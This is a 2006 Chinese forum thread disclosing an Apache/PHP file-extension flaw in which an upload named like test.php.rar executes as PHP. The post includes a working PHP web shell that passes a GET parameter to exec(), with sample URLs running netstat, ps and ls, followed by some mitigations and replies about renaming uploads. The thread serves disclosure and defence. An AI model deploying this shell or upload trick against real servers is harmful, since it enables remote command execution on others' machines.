关于php apache后缀漏洞 附测试代码 和解决办法
时间:2006-12-19
来源:互联网
如果你是把上传的文件统一改名了还好。
如果没有改名。那么就危险拉。
如果他上传jpg,gif,zip还好说拉。如果他上一个 xxx.php.rar 的文件那么就轻松拿到你的web sheel 拉 。
测试代码:
<?
if($_GET[comm]!='')
{
exec($_GET[comm],$re);
foreach($re as $v)
echo $v.'<br>';
}
else
exit('Please input command...');
?>
以上代码另存为test.php.rar
测试代码:
http://localhost:/test.php.rar?comm=netstat -n
http://localhost:/test.php.rar?comm=ps -A
http://localhost:/test.php.rar?comm=ls
当然他还可以上传一个取消限制的上传工具。在上一些黑客工具,木马后门,到你服务器,慢慢整你。
解决办法
1.你没有用户上传,跳过,没事拉。
2.你限制用户上传,注意只是后缀限制是不完善的。特别是javascript的判断和限制。
3.修改用户上传的文件的文件名。
4.升级php/apache(当然得等官方有和解决再说)
[ 本帖最后由 ocheers 于 2006-12-19 16:41 编辑 ]
作者: ocheers 发布时间: 2006-12-19
作者: �����i�i 发布时间: 2006-12-19
作者: Nickboy 发布时间: 2006-12-19
算了。就算是引起大家注意把。
作者: ocheers 发布时间: 2006-12-19
作者: 默默 发布时间: 2006-12-19
作者: leehui1983 发布时间: 2006-12-19
作者: hy0kl 发布时间: 2006-12-21
作者: leehui1983 发布时间: 2006-12-21
就是上传后更改名称
假如是
xx.php.rar
那么我保留后面的.rar,其他的我一律给他改了。。。这样不知道能不能解决?
作者: edwardhey 发布时间: 2006-12-21
作者: leehui1983 发布时间: 2006-12-21
作者: softly 发布时间: 2006-12-22
热门阅读
-
office 2019专业增强版最新2021版激活秘钥/序列号/激活码推荐 附激活工具
阅读:74
-
如何安装mysql8.0
阅读:31
-
Word快速设置标题样式步骤详解
阅读:28
-
20+道必知必会的Vue面试题(附答案解析)
阅读:37
-
HTML如何制作表单
阅读:22
-
百词斩可以改天数吗?当然可以,4个步骤轻松修改天数!
阅读:31
-
ET文件格式和XLS格式文件之间如何转化?
阅读:24
-
react和vue的区别及优缺点是什么
阅读:121
-
支付宝人脸识别如何关闭?
阅读:21
-
腾讯微云怎么修改照片或视频备份路径?
阅读:28
